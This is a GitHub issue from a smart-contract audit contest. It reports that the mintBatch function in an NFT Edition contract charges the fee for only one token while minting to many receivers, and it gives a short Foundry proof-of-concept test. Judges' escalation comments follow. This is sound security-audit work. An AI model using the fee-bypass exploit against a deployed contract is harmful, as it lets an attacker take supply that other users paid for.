Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ArsenLupin - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId #330

Closed
sherlock-admin3 opened this issue Apr 26, 2024 · 5 comments
Closed

ArsenLupin - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId #330

sherlock-admin3 opened this issue Apr 26, 2024 · 5 comments
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Escalation Resolved This issue's escalations have been approved/rejected High A valid High severity issue Reward A payout will be made for this issue Sponsor Confirmed The sponsor acknowledged this issue is valid Won't Fix The sponsor confirmed this issue will not be fixed

Comments

@sherlock-admin3
Copy link
Contributor

sherlock-admin3 commented Apr 26, 2024
edited by Evert0x
Loading

ArsenLupin

high

The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId

Summary

In the mintBatch function we can mint a token to a set of receivers for the given work. However the function works incorrectly, because the fees is paid only for 1 tokenId, but the issue function mint tokenId in the loop to the different addresses.

Vulnerability Detail

  1. Attacker create many accounts as receivers_
  2. Attacker invoke the mintBatch and pay the fee for minting 1 tokenId.
    2.1 - The 1 tokenId is minted for each receiver in the loop till the maxSupply is reached
  3. Attacker receives all the tokenId's while paying only for one tokenId
function test_mintBatchToManyUsers() public {
        address[] memory users = new address[](5);
        users[0] = address(1);
        users[1] = address(2);
        users[2] = address(3);
        users[3] = address(4);
        users[4] = address(5);

        address attacker = address(8888);
        vm.deal(address(attacker), 1 ether);

        console.log("The attacker balance before", address(attacker).balance);
        vm.prank(address(attacker));
        edition.mintBatch{value: 0.01275 ether}(users, 1, 1, "0x");
        console.log("The attacker balance after", address(attacker).balance);
    }

Impact

Attacker could mint all the tokenId's to hisself(accounts that belongs to attacker) and prevent other user's from minting this tokenId

Code Snippet

https://github.com/sherlock-audit/2024-04-titles/blob/main/wallflower-contract-v2/src/editions/Edition.sol#L304-L320

Tool used

Manual Review / Foundry

Recommendation

Ensure that the correct amount of fees is paid, based on the overall amount of minted tokenId's.

Duplicate of #264
@github-actions github-actions bot closed this as completed May 6, 2024
@github-actions github-actions bot added the Excluded Excluded by the judge without consulting the protocol or the senior label May 6, 2024
@sherlock-admin2 sherlock-admin2 changed the title Prehistoric Mercurial Monkey - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId ArsenLupin - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId May 12, 2024
@sherlock-admin2 sherlock-admin2 added the Non-Reward This issue will not receive a payout label May 12, 2024
@ShaheenRehman
Copy link

Escalate

This finding is a valid dup of #264

@sherlock-admin3
Copy link
Contributor Author

Escalate

This finding is a valid dup of #264

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

@sherlock-admin4 sherlock-admin4 added the Escalated This issue contains a pending escalation label May 13, 2024
@WangSecurity
Copy link
Collaborator

Agree with the escalation, planning to accept and duplicate with #264

@Evert0x Evert0x added the High A valid High severity issue label May 17, 2024
@sherlock-admin2 sherlock-admin2 added Reward A payout will be made for this issue and removed Non-Reward This issue will not receive a payout labels May 17, 2024
@Evert0x
Copy link

Evert0x commented May 17, 2024

Result:
High
Duplicate of #264

@sherlock-admin2 sherlock-admin2 removed the Escalated This issue contains a pending escalation label May 17, 2024
@sherlock-admin3 sherlock-admin3 added the Escalation Resolved This issue's escalations have been approved/rejected label May 17, 2024
@sherlock-admin4
Copy link
Contributor

Escalations have been resolved successfully!

Escalation status:

@sherlock-admin3 sherlock-admin3 added Sponsor Confirmed The sponsor acknowledged this issue is valid Won't Fix The sponsor confirmed this issue will not be fixed labels May 20, 2024
@sherlock-admin2 sherlock-admin2 added Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label and removed Excluded Excluded by the judge without consulting the protocol or the senior labels May 27, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Escalation Resolved This issue's escalations have been approved/rejected High A valid High severity issue Reward A payout will be made for this issue Sponsor Confirmed The sponsor acknowledged this issue is valid Won't Fix The sponsor confirmed this issue will not be fixed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
6 participants
@Evert0x @ShaheenRehman @WangSecurity @sherlock-admin2 @sherlock-admin3 @sherlock-admin4